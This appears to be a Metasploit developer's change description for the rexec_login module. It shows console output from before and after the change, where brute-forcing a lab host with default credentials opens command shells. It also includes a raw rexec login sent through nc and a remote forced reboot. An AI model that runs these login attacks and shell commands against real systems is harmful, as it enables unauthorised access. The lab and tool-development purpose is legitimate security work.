rexec_login improvements

[g0tmi1k]

Before

[*] Connected to the database specified in the YAML file
[*] Connected to msf. Connection type: postgresql. Connection name: OYGIkFxA.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
msf > use auxiliary/scanner/rservices/rexec_login
msf auxiliary(scanner/rservices/rexec_login) > options

Module options (auxiliary/scanner/rservices/rexec_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   CreateSession     true             no        Create a new session for every successful login
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   ENABLE_STDERR     false            yes       Enables connecting the stderr port
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS            10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             512              yes       The target port (TCP)
   STDERR_PORT                        no        The port to listen on for stderr
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(scanner/rservices/rexec_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - 10.0.0.10:512 - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512 - Attempting rexec with username:password 'msfadmin':'msfadmin'
[+] 10.0.0.10:512         - 10.0.0.10:512, rexec 'msfadmin' : 'msfadmin'
[*] Command shell session 1 opened (10.0.0.1:43005 -> 10.0.0.10:512) at 2026-04-23 17:07:43 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >

After

msf auxiliary(scanner/rservices/rexec_login) > reload
[*] Reloading module...
msf auxiliary(scanner/rservices/rexec_login) >
msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Attempting rexec with msfadmin:msfadmin
[+] 10.0.0.10:512         - rexec successful login: msfadmin:msfadmin
[*] Command shell session 2 opened (10.0.0.1:39301 -> 10.0.0.10:512) at 2026-04-23 17:13:03 +0100
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >

---

rDNS issue

$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
Where are you?
$
$ sudo killall dnsmasq
$ sudo dnsmasq --interface=tap0 --bind-interfaces --dhcp-range=10.0.0.2,10.0.0.10,12h --host-record=attacker,10.0.0.1
$
$ ssh1 msfadmin@10.0.0.10 sudo reboot -f
/etc/ssh/ssh_config line 52: Unsupported option "gssapiauthentication"
msfadmin@10.0.0.10's password:
[sudo] password for msfadmin: msfadmin
$
$ { printf '0\0msfadmin\0msfadmin\0id\0'; sleep 2; } | nc 10.0.0.10 512
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
$

msf auxiliary(scanner/rservices/rexec_login) > run
[*] 10.0.0.10:512         - Starting rexec sweep
[*] 10.0.0.10:512         - Skipping stderr call back
[*] 10.0.0.10:512         - Attempting rexec with msfadmin:msfadmin
[-] 10.0.0.10:512         - Result: Where are you?
[-] 10.0.0.10:512         - The rexecd service could not resolve a hostname for 10.0.0.1. Ensure a reverse DNS (PTR) record exists for your attacking host.
[-] 10.0.0.10:512         - 10.0.0.10:512         - [1/2] - Bruteforce cancelled against this service.
[*] 10.0.0.10:512         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/rservices/rexec_login) >